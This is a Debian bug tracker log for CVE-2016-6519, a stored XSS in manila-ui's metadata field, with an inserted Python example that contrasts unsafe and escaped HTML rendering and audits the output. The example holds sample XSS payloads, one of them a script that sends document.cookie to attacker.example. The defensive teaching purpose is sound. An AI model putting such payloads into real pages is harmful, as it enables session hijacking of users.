manila-ui: CVE-2016-6519: persistent XSS in metadata field

Related Vulnerabilities: CVE-2016-6519  

Debian Bug report logs - #838017

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Fri, 16 Sep 2016 13:03:07 UTC

Severity: grave

Tags: patch, security, upstream

Found in version manila-ui/2.1.0-2

Fixed in version manila-ui/2.5.1-0

Done: Thomas Goirand <zigo@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#838017; Package src:manila-ui. (Fri, 16 Sep 2016 13:03:10 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>. (Fri, 16 Sep 2016 13:03:10 GMT)


Message #5 received at submit@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: manila-ui: CVE-2016-6519: persistent XSS in metadata field
Date: Fri, 16 Sep 2016 15:01:28 +0200
Source: manila-ui
Version: 2.1.0-2
Severity: grave
Tags: security upstream patch

Hi,

the following vulnerability was published for manila-ui.

CVE-2016-6519[0]:
persistent XSS in metadata field

[1] and [2] contain both patches.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2016-6519
[1] https://bugzilla.redhat.com/show_bug.cgi?id=1375147
[2] https://bugzilla.novell.com/show_bug.cgi?id=988935

Regards,
Salvatore
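
The report names only the vulnerability class, a persistent (stored) XSS in the share metadata field, and does not reproduce the affected template. The following Python example is added here and is not code from manila-ui, Horizon or the Debian report; every name and the sample payloads are assumptions. It shows the shape of such a bug with a constructed metadata dictionary: a dashboard view renders user-supplied key/value pairs into an HTML table by plain string interpolation, so a stored key or value becomes markup, while the hardened variant escapes each key and value for both text and attribute context with `html.escape(quote=True)` (Django templates do this automatically unless autoescaping is disabled or the value is marked safe). The `audit()` helper parses the rendered output with the stdlib `HTMLParser` and reports any tag or attribute the template itself never emits, which is the kind of regression check a packager can run against a backported fix.

```python
import html
from html.parser import HTMLParser

# Constructed sample (not taken from the bug report): metadata keys and values are
# set by the share owner, so an attacker can store both of these through the API.
MALICIOUS_METADATA = {
    "description": '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'x" onmouseover="alert(1)': "y",   # key that breaks out of an attribute
}


def render_metadata_unsafe(metadata):
    """Vulnerable pattern: untrusted text interpolated straight into HTML.

    Assumed shape of the bug class; manila-ui's real template is not reproduced here.
    """
    rows = "".join(
        f'<tr><td title="{k}">{k}</td><td>{v}</td></tr>' for k, v in metadata.items()
    )
    return f"<table>{rows}</table>"


def render_metadata_safe(metadata):
    """Hardened pattern: escape every untrusted string for text and attribute context.

    quote=True also encodes " and ' so a value cannot terminate an attribute.
    """
    rows = "".join(
        f'<tr><td title="{html.escape(k, quote=True)}">{html.escape(k, quote=True)}</td>'
        f"<td>{html.escape(v, quote=True)}</td></tr>"
        for k, v in metadata.items()
    )
    return f"<table>{rows}</table>"


# The only elements and attributes the table template is supposed to produce.
ALLOWED_TAGS = {"table", "tr", "td"}
ALLOWED_ATTRS = {"title"}


class _TagAudit(HTMLParser):
    """Collect every element name and attribute name the browser would see."""

    def __init__(self):
        super().__init__()
        self.tags = set()
        self.attrs = set()

    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)
        self.attrs.update(name for name, _ in attrs)


def audit(rendered_html):
    """Return tags and attributes in the output that the template never emits.

    An empty result means no stored metadata turned into markup; anything else
    (a <script> element, an on* handler) is an XSS sink that survived rendering.
    """
    parser = _TagAudit()
    parser.feed(rendered_html)
    parser.close()
    return {
        "unexpected_tags": parser.tags - ALLOWED_TAGS,
        "unexpected_attrs": parser.attrs - ALLOWED_ATTRS,
    }


if __name__ == "__main__":
    print("unsafe:", audit(render_metadata_unsafe(MALICIOUS_METADATA)))
    print("safe:  ", audit(render_metadata_safe(MALICIOUS_METADATA)))
```

The audit deliberately uses a real HTML parser rather than a regular expression: in the escaped output the text ` onmouseover=` still appears inside the `title` attribute value, but as `&quot;`-delimited data, and only a parser distinguishes that from a second attribute.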



Reply sent to Thomas Goirand <zigo@debian.org>:
You have taken responsibility. (Thu, 06 Oct 2016 17:15:07 GMT)


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Thu, 06 Oct 2016 17:15:07 GMT)


Message #10 received at 838017-done@bugs.debian.org:

From: Thomas Goirand <zigo@debian.org>
To: 838017-done@bugs.debian.org
Subject: This was fixed in version 2.5.0
Date: Thu, 6 Oct 2016 19:12:27 +0200
This was fixed in version 2.5.0, which I uploaded to Sid.



Information forwarded to debian-bugs-dist@lists.debian.org, PKG OpenStack <openstack-devel@lists.alioth.debian.org>:
Bug#838017; Package src:manila-ui. (Fri, 07 Oct 2016 05:21:04 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
Extra info received and forwarded to list. Copy sent to PKG OpenStack <openstack-devel@lists.alioth.debian.org>. (Fri, 07 Oct 2016 05:21:05 GMT)


Message #15 received at 838017@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: 838017@bugs.debian.org, zigo@debian.org
Subject: Re: Bug#838017 closed by Thomas Goirand <zigo@debian.org> (This was fixed in version 2.5.0)
Date: Fri, 7 Oct 2016 07:19:50 +0200
Control: fixed -1 2.5.1-0

Hi Thomas,

On Thu, Oct 06, 2016 at 05:15:07PM +0000, Debian Bug Tracking System wrote:
> This was fixed in version 2.5.0, which I uploaded to Sid.

That's not true AFAICT, since I did check as well 2.5.0-1 when it was
in experimental and it did not contain the patch. The patch though seems
included in 2.5.1 (which is now as well in unstable).

Regards,
Salvatore



Marked as fixed in versions manila-ui/2.5.1-0. Request was from Salvatore Bonaccorso <carnil@debian.org> to 838017-submit@bugs.debian.org. (Fri, 07 Oct 2016 05:21:05 GMT)


Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Wed, 09 Nov 2016 07:26:56 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 13:46:37 2019; Machine Name: beach
